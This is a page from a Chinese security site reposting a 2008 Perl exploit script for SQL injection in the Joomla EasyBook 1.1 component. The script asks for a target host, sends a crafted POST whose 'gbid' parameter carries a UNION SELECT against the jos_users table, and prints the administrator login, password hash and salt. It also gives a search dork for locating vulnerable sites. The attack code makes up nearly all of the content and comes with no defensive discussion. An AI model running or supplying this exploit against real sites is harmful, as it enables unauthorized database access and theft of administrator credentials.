首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit 来源：http://antichat.ru 作者：ZAMUT 发布时间：2008-06-05   #!/usr/bin/perl use IO::Socket; use strict; ##### INFO############################## # Example:                             # # Host: xxx.lu                 # # &md: 0f8ab366793a0d1da85c6f5a8d4fb576# ######################################## print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n"; print "-+--                                                      --+-\n"; print "-+--            Author: ZAMUT                             --+-\n"; print "-+--            Vuln: gbid=                               --+-\n"; print "-+--            Homepage: http://antichat.ru              --+-\n"; print "-+--            Dork: com_easybook                        --+-\n\n"; print "Host:" ; chomp(my $host=<STDIN>); print "&md="; chomp(my $md=<STDIN>); my ($socket,$lhs,$l,$h,$s); $socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!"); print $socket  "POST /index.php HTTP/1.0\n".                "Host: www.$host\n".    "Content-Type: application/x-www-form-urlencoded\n".    "Content-Length: 214\n\n".                "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";   while(<$socket>)   { $s = <$socket>; if($s=~/:::(.+):::/){    $lhs = $1;        ($l,$h,$s)=split(':',$lhs);    print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";    close $socket;    exit; }   }   die ("Exploit failed!");   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·VideoScript 3.0 <= 4.1.5.55 Un   相关文章 ·HP StorageWorks NSI Double Tak ·Akamai Download Manager < 2.2. ·Joomla Component jotloader <= ·Black Ice Software Inc Barcode ·ipbProArcade 2.5.1 (user) Remo ·Black Ice Software Inc Barcode ·Joomla Component JooBlog 0.1.1 ·Asterisk (SIP channel driver / ·C6 Messenger ActiveX Remote Do ·Black Ice Software Inc Barcode ·MDaemon <= 9.6.5 Multiple Remo ·Galatolo Web Manager <= 1.0 Re   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved